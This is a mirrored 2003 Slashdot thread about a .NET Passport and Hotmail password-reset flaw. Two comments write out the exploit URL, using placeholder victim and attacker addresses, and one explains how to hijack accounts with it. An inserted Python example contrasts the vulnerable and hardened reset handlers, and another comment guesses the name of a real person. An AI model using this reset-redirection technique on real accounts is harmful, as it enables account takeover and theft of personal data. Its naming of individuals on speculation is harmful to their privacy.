Slashdot Mirror


Security Vulnerability in Microsoft .NET Passport

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

8 of 433 comments

  1. Re:Remember... by Anonymous Coward · · Score: 5, Informative

    According to a Dutch news site this hole was fixed shortly after the posting... So that's the way to talk to Microsoft.....

    nu.nl for people knowing how to read Dutch (no NOT German)..

  2. Re:Remember... by m00nun1t · · Score: 4, Informative

    I fully agree this passport problem is a lame & inexcusable fault that should never, ever have happened.

    However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

    The only product that is really valid to criticise under the trustworthy computing tag is Windows Server 2003 - if that has big problems, then trustworthy computing has failed. But don't drag up old products/services.

  3. MS-Passport and those that cannot/willnot read by SgtChaireBourne · · Score: 5, Informative
    MS-Passport has long been known to be impossible to secure, even in theory: See Risks of the Passport Single Signon Protocol. Even the FTC charged Microsoft with deceptive advertising in regards to MS-Passport. Other governments are not getting caught with their mouth open either. Standards body forced Redmond to pull 'unsubstantiated and misleading' advertisement.

    There really does seem to be no difference between someone who cannot read and someone who does not. Those that can read wouldn't be caught using MS-Passport. Sadly, signal can be drowned out by noise coming from a colossal marketing blitz to last through September.

    We'll see if they last that long. Windows2003 seems to be more of a push to get users over to OS X or Linux. Their other (2nd of 2) cash cow, the new MS-Office has already been postponed and seems to be more of an incentive to move to OpenOffice than to upgrade.

    --
    Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
  4. This is not new by johnatjohnytech · · Score: 5, Informative

    This is not a new thing, this has been around for a while.

    It is about time somebody tried to bring this to light. But I really doubt he "discovered" something that has been known about for a while.

    Don't believe me? Do a search on kazaa for hotmail passwords. You will find several txt/doc's with these or similar instructions.

  5. What breed of idiot are you? by gazbo · · Score: 5, Informative
    So it isn't a standard IIS 404. That is wrong how? Let me put it another way:
    lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1'

    HTTP/1.1 404 Not Found
    Server: Microsoft-IIS/5.0
    Date: Thu, 08 May 2003 13:10:14 GMT
    PPServer: H: LAWPPREGU4A002
    It's a 404. It returns a 404 code. It says it's a 404 on the page. Just because you understand so little of the HTTP protocol to think that 404 means "displays apache logo" doesn't make MS wrong.
  6. Re:thoughts by Kredal · · Score: 5, Informative

    Since it's been 404'd, I'll provide it here.

    If you went to:

    https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

    and replaced the victim address to a real user, and the attacker@attacker.com to your address, they would send you an email telling you to click on another link, and you could set your own password. Wala, you now have rights to that hotmail account so you can read their mail, look at their buddy list, safely spam people, buy stuff (if they have their credit card saved), etc etc etc... Real fun stuff.

    --
    Whoever stated that signature sizes should be limited to one hundred and twenty characters can just go ahead and kiss my
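
Added example, not part of the thread and not Microsoft's code: a minimal Python model of the reset flow Kredal describes, with a handler that mails the reset link to the client-supplied `prefem` address next to one that uses only the recovery address stored on the account. The `em` and `prefem` parameter names come from the URL in the thread; the account store, function names and recovery address are constructed for illustration.

```python
import hashlib
import secrets
from urllib.parse import parse_qs

# Constructed data: login address -> recovery address held server-side.
ACCOUNTS = {"victim@hotmail.com": {"recovery": "victim-alt@example.org"}}
RESET_TOKENS = {}  # sha256(token) -> account; only the hash is stored
OUTBOX = []        # (recipient, token) pairs; stands in for the mail system


def _issue_token(account, recipient):
    """Create a random reset token and 'mail' it to recipient."""
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[hashlib.sha256(token.encode()).hexdigest()] = account
    OUTBOX.append((recipient, token))
    return recipient


def reset_vulnerable(query):
    """Flawed pattern: the reset link goes wherever 'prefem' says."""
    params = parse_qs(query, keep_blank_values=True)
    account = params.get("em", [""])[0].lower()
    if account not in ACCOUNTS:
        return None
    return _issue_token(account, params.get("prefem", [""])[0])


def reset_hardened(query):
    """Corrected pattern: the delivery address comes from the account record."""
    params = parse_qs(query, keep_blank_values=True)
    account = params.get("em", [""])[0].lower()
    record = ACCOUNTS.get(account)
    if record is None:
        return None  # the caller should answer identically either way
    # 'prefem' and any other client-supplied address are ignored here.
    return _issue_token(account, record["recovery"])


def redeem(token):
    """Single use: the token is deleted on first redemption."""
    return RESET_TOKENS.pop(hashlib.sha256(token.encode()).hexdigest(), None)
```
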
  7. his name is probably by abhisarda · · Score: 4, Informative

    Robert Babcock.

    Do a search for Ashyukun on Google (www.nhmk.com/nes/).

    also at

    (http://216.239.33.104/search?q=cache:q1XY1gcmAYAC:www.animemusicvideos.org/members/linkprobview.php%3Fdownload_id%3D1442+Robert+Babcock+ashyukun&hl=en&ie=UTF-8).

    Consider yourself lucky you don't have to deal with hotmail. Hmm.. what do guys with names like Dick Cheney do?

  8. Re:Remember... by Reziac · · Score: 3, Informative

    Not fixed -- per the articles (which, sadly, I did read) they just shut down the function that allows users to change their password.

    --
    ~REZ~ #43301. Who'd fake being me anyway?